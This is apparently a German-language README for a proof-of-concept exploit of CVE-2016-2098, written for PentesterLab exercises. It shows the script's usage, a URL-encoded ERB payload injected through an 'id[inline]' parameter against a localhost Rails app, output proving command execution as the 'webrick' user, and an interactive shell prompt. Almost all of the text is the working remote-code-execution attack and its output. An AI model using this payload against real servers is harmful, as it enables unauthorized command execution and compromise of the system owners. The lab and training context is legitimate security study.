
Ein PoC von CVE-2016-2098, den ich für PentesterLab erstellt habe
Habe dies für PentesterLab geschrieben
Wenn du von PentesterLab kommst, schummel nicht, es ist viel besser zu lernen.
Hoffe, es ist für jemanden nützlich, wenn nicht für mich in der Zukunft :)
Hat interaktive Shell, nette argparse-Sachen auch
usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
script.py: error: the following arguments are required: --url
$ python3 script.py --url "http://localhost:8000/pages?id=test"
[+] No parameter specified. Available parameters: ['id']
[+] Testing parameter: id
[+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
[+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
webrick